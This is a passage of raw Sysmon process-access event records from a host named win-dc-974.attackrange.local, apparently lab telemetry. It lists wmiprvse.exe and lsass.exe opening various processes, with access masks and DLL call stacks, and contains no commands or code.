244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 